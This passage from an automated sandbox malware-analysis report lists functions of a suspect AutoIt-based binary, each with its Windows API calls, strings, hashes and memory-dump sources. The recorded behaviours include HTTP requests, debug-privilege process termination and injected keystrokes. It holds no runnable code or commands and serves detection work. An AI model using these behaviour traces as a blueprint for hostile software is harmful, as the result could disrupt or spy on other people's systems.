                                                        • Opcode Fuzzy Hash: 0846616aedc40ac12e9ab4180ac4bd83d7aa3fd3aa4358dfb6737c439bf9d32d
                                                        • Instruction Fuzzy Hash: DED18C35701212DFCB29EF15D499A29F7A0BF45700F2591ADE68ABB261CB30ED12CF61
                                                        Function 00E67DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E67FAD
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E67FC1
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00E67FEB
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E68005
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E68017
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E68060
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E680B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile
                                                        • String ID: *.*
                                                        • API String ID: 769691225-438819550
                                                        • Opcode ID: 0c78d146aeb328c6a54c900f9766e3da3dff638c0698ec408111909093c4b1f4
                                                        • Instruction ID: bba720e70c03a0449ab205188d716ae3abb11e20b370d15a244059d023c54c18
                                                        • Opcode Fuzzy Hash: 0c78d146aeb328c6a54c900f9766e3da3dff638c0698ec408111909093c4b1f4
                                                        • Instruction Fuzzy Hash: 2C81C2715482059FCB20DF14D8449AAB3E8BF88398F146C5EF8C5E7250EB36DD49CB62
                                                        Function 00DF5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00DF5C7A
                                                          • Part of subcall function 00DF5D0A: GetClientRect.USER32(?,?), ref: 00DF5D30
                                                          • Part of subcall function 00DF5D0A: GetWindowRect.USER32(?,?), ref: 00DF5D71
                                                          • Part of subcall function 00DF5D0A: ScreenToClient.USER32(?,?), ref: 00DF5D99
                                                        • GetDC.USER32 ref: 00E346F5
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E34708
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00E34716
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00E3472B
                                                        • ReleaseDC.USER32(?,00000000), ref: 00E34733
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E347C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: ec4d308d0eb4b342599e05686a357e5f0ce6279f3b11f78640075ebe2a95b3e4
                                                        • Instruction ID: 6e349b99d37fbdbc976ca201404d04ca3aae9c332d11e50f833465271174d6f8
                                                        • Opcode Fuzzy Hash: ec4d308d0eb4b342599e05686a357e5f0ce6279f3b11f78640075ebe2a95b3e4
                                                        • Instruction Fuzzy Hash: B271E171400209DFCF218F64C989ABA3FB1FF46358F14526AEE567A1AAC731E841DF60
                                                        Function 00E6359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00E635E4
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        • LoadStringW.USER32(00EC2390,?,00000FFF,?), ref: 00E6360A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: LoadString$_wcslen
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 4099089115-2391861430
                                                        • Opcode ID: 01bbaab00bd81c30582c85f59d23964498e320af0b653b4396d043ac2534285c
                                                        • Instruction ID: 09eb875ebac11cf86a959cb4316ecccd85dd1153a2d39569ce66164a97c0605a
                                                        • Opcode Fuzzy Hash: 01bbaab00bd81c30582c85f59d23964498e320af0b653b4396d043ac2534285c
                                                        • Instruction Fuzzy Hash: 00517D71C00209AADF15EBA0DC42EFEBBB8EF05344F159165F605721A2EB316A99DF70
                                                        Function 00E6C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E6C272
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E6C29A
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E6C2CA
                                                        • GetLastError.KERNEL32 ref: 00E6C322
                                                        • SetEvent.KERNEL32(?), ref: 00E6C336
                                                        • InternetCloseHandle.WININET(00000000), ref: 00E6C341
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3113390036-3916222277
                                                        • Opcode ID: 7d911c8b021b4f1374ea86150f06aad8ee8a7f98b18639f62b758dff1a6f6e6c
                                                        • Instruction ID: b54cd39ea44326ca804edee56af9612a3ffef2a75c0642b2ab48da698850987d
                                                        • Opcode Fuzzy Hash: 7d911c8b021b4f1374ea86150f06aad8ee8a7f98b18639f62b758dff1a6f6e6c
                                                        • Instruction Fuzzy Hash: D3319571580604AFD7219F65EC88ABB7BFCEB49784B20951EF48AB2210D735DD098B70
                                                        Function 00E5989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E33AAF,?,?,Bad directive syntax error,00E8CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E598BC
                                                        • LoadStringW.USER32(00000000,?,00E33AAF,?), ref: 00E598C3
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E59987
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 858772685-4153970271
                                                        • Opcode ID: 26737657e4eae24a09fd3d08b9ae0ea016db59ffbab687a1f36b4db07c32754f
                                                        • Instruction ID: c11b7af9607f43f7237126f1f5e92009f85422b8f506758a957e0862d6cf2fd6
                                                        • Opcode Fuzzy Hash: 26737657e4eae24a09fd3d08b9ae0ea016db59ffbab687a1f36b4db07c32754f
                                                        • Instruction Fuzzy Hash: 6E215C3180021EABCF11AF90CC06EEE77B5FF18345F049469F619720A2EA359628DB20
                                                        Function 00E5209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32 ref: 00E520AB
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00E520C0
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E5214D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1290815626-3381328864
                                                        • Opcode ID: 11ebdaa7e80f01b7829fe63aa79634a4932c7676328ace403e4107f95fceea74
                                                        • Instruction ID: 80bb06dd986d3c2589fa8d3a23fa409f08d9dec43d4a8f81602b7150cbedf136
                                                        • Opcode Fuzzy Hash: 11ebdaa7e80f01b7829fe63aa79634a4932c7676328ace403e4107f95fceea74
                                                        • Instruction Fuzzy Hash: 83110677688B06B9FA052220EC07DE737DCCF06729F20342AFF04B50E1FE6168496A54
                                                        Function 00E2CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                        • String ID:
                                                        • API String ID: 1282221369-0
                                                        • Opcode ID: 56a21979cdc234efd0f5123c1e68e6ecb26143992366593bcd61dd78371f0720
                                                        • Instruction ID: 2aa863f68d58e95df5ddf35680485e2833e6c729739114eff5039c12c2550675
                                                        • Opcode Fuzzy Hash: 56a21979cdc234efd0f5123c1e68e6ecb26143992366593bcd61dd78371f0720
                                                        • Instruction Fuzzy Hash: 81615671A04320AFEB21AFB4FD81A6E7BE5EF05314F24126DFA45B7281E6329D418790
                                                        Function 00E850D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00E85186
                                                        • ShowWindow.USER32(?,00000000), ref: 00E851C7
                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 00E851CD
                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00E851D1
                                                          • Part of subcall function 00E86FBA: DeleteObject.GDI32(00000000), ref: 00E86FE6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E8520D
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E8521A
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E8524D
                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00E85287
                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00E85296
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                        • String ID:
                                                        • API String ID: 3210457359-0
                                                        • Opcode ID: 7aca258518ea535b46bc4e0f52b80ffd10a861e01649b8fbed21056069b33985
                                                        • Instruction ID: 2eaf76933880f2e1528e716928b7f343a1bc22be5e20d55bfeb05c532f69f1ea
                                                        • Opcode Fuzzy Hash: 7aca258518ea535b46bc4e0f52b80ffd10a861e01649b8fbed21056069b33985
                                                        • Instruction Fuzzy Hash: 3E51B032A41A08FEEF20AF64CC49BD83BB5BB05325F246012F61CB62E1CF719994DB51
                                                        Function 00E08B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00E46890
                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E468A9
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E468B9
                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E468D1
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E468F2
                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E08874,00000000,00000000,00000000,000000FF,00000000), ref: 00E46901
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E4691E
                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E08874,00000000,00000000,00000000,000000FF,00000000), ref: 00E4692D
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                        • String ID:
                                                        • API String ID: 1268354404-0
                                                        • Opcode ID: 3646cce4e804d2d9b3be44b8c540413c8160c140d93ee472c4cf9f7ccaa8e222
                                                        • Instruction ID: 7e444c6d6f681c7b27c3c87be20a9477e8429aa9048804157d96469d93bfd6ae
                                                        • Opcode Fuzzy Hash: 3646cce4e804d2d9b3be44b8c540413c8160c140d93ee472c4cf9f7ccaa8e222
                                                        • Instruction Fuzzy Hash: 66519774600209EFDB24CF25DC51FAA3BB5EB89724F205528F986B72E0DB71E990DB50
                                                        Function 00E6C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E6C182
                                                        • GetLastError.KERNEL32 ref: 00E6C195
                                                        • SetEvent.KERNEL32(?), ref: 00E6C1A9
                                                          • Part of subcall function 00E6C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E6C272
                                                          • Part of subcall function 00E6C253: GetLastError.KERNEL32 ref: 00E6C322
                                                          • Part of subcall function 00E6C253: SetEvent.KERNEL32(?), ref: 00E6C336
                                                          • Part of subcall function 00E6C253: InternetCloseHandle.WININET(00000000), ref: 00E6C341
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 337547030-0
                                                        • Opcode ID: 711a381b418cbe73f99b243f66655a0e9c8e53ca8a6390c4bebfd57c536da112
                                                        • Instruction ID: a8c62ecbd0f581147e81c044db676a68ffbe2b218c8233dee9b22eef1d9d40ac
                                                        • Opcode Fuzzy Hash: 711a381b418cbe73f99b243f66655a0e9c8e53ca8a6390c4bebfd57c536da112
                                                        • Instruction Fuzzy Hash: AF31A371140A05EFDB219FB5EC14A777BF8FF19384B20541EF99AA3620D731E8159B60
                                                        Function 00E525A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E53A57
                                                          • Part of subcall function 00E53A3D: GetCurrentThreadId.KERNEL32 ref: 00E53A5E
                                                          • Part of subcall function 00E53A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E525B3), ref: 00E53A65
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E525BD
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E525DB
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E525DF
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E525E9
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E52601
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E52605
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E5260F
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E52623
                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E52627
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: 9b4e1075f25edf1570fec2c877fac35eb97f95a3302030b6fbc85e535ac344f2
                                                        • Instruction ID: b832f8aac74d81c23eed2fb937f5e5954b4147f0ad928616c7cb9236399bb0d4
                                                        • Opcode Fuzzy Hash: 9b4e1075f25edf1570fec2c877fac35eb97f95a3302030b6fbc85e535ac344f2
                                                        • Instruction Fuzzy Hash: 6801B131290210BBFB1067699C8EF597FA9DB4BB52F201415F718BE0D5C9F224889A7A
                                                        Function 00E51803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E51449,?,?,00000000), ref: 00E5180C
                                                        • HeapAlloc.KERNEL32(00000000,?,00E51449,?,?,00000000), ref: 00E51813
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E51449,?,?,00000000), ref: 00E51828
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00E51449,?,?,00000000), ref: 00E51830
                                                        • DuplicateHandle.KERNEL32(00000000,?,00E51449,?,?,00000000), ref: 00E51833
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E51449,?,?,00000000), ref: 00E51843
                                                        • GetCurrentProcess.KERNEL32(00E51449,00000000,?,00E51449,?,?,00000000), ref: 00E5184B
                                                        • DuplicateHandle.KERNEL32(00000000,?,00E51449,?,?,00000000), ref: 00E5184E
                                                        • CreateThread.KERNEL32(00000000,00000000,00E51874,00000000,00000000,00000000), ref: 00E51868
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 0835891efd23f2439a2cd5f4afac1b02628845bd54d36c02f28d0551e31d7299
                                                        • Instruction ID: 82e819d20b05b878adfc98a589b806676fb57c0593fe473d8a4669947303dc84
                                                        • Opcode Fuzzy Hash: 0835891efd23f2439a2cd5f4afac1b02628845bd54d36c02f28d0551e31d7299
                                                        • Instruction Fuzzy Hash: 7C01BF75241304BFE710ABA5DC8DF573B6CEB8AB11F104451FA05EB192D6719804CB30
                                                        Function 00E7A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E5D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00E5D501
                                                          • Part of subcall function 00E5D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00E5D50F
                                                          • Part of subcall function 00E5D4DC: CloseHandle.KERNEL32(00000000), ref: 00E5D5DC
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7A16D
                                                        • GetLastError.KERNEL32 ref: 00E7A180
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7A1B3
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E7A268
                                                        • GetLastError.KERNEL32(00000000), ref: 00E7A273
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E7A2C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: 9b4aac7aa635ed3bf5eef84f5ea84cd5036423d67b8f7d8cc0a28d3e25422a87
                                                        • Instruction ID: 10fb4a69c8af95d94ae7ac80adc72f8b170f1e86fbb97715f509c2b46fe44f34
                                                        • Opcode Fuzzy Hash: 9b4aac7aa635ed3bf5eef84f5ea84cd5036423d67b8f7d8cc0a28d3e25422a87
                                                        • Instruction Fuzzy Hash: A661A070205242AFD310DF15C494F29BBE1AF84318F59C49CE45A5B7A3C772EC49CBA2
                                                        Function 00E83886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E83925
